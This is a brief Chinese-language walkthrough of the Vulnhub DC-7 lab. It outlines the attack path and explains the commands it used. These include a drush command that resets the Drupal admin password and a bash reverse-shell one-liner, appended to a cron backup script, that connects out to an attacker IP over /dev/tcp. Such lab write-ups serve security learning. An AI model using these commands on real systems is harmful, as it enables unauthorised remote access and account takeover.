Vulnhub——DC-7渗透

一、涉及漏洞类型

web管理软件漏洞

web插件漏洞

二、渗透思路

主机发现 => 端口扫描 => 访问web服务 => gihub源码泄露 => ssh远程登录 => 发现数据库信息 => 得知用户名 => 修改用户密码 => 登录web页面 => 修改页面源码反弹shell => 找到flag

三、学到知识点

1.gpg

GnuPG软件（简称GPG），它是目前最流行、最好用的加密工具之一。

gpg -d website.tar.gz.gpg > website.tar.gz

 使用gpg对文件进行加密

2.drush

Drush是一款以命令行方式和Unix脚本界面管理Drupal的软件。

drush user-password admin --password="123456"

修改admin用户的密码 

3. Linux bash反弹shell

 echo "bash -i >& /dev/tcp/10.10.10.244/4444 0>&1" >> /opt/scripts/backups.sh

bash -i 产生一个交互式bash，bash 是linux 的一个比较常见的shell,其实linux的shell还有很多，比如 sh、zsh、等，他们之间有着细小差别），-i 这个参数表示的是产生交互式的shell

>& /dev/tcp/ip/port 建立TCP连接，并将标准输出和错误重定向到TCP连接，/dev/tcp|udp/ip/port 这个文件是特别特殊的，实际上可以将其看成一个设备（Linux下一切皆文件），其实如果你访问这个文件的位置他是不存在的。

0>&1 从TCP连接获取输入

四、参考

https://blog.csdn.net/weixin_45605352/article/details/119513996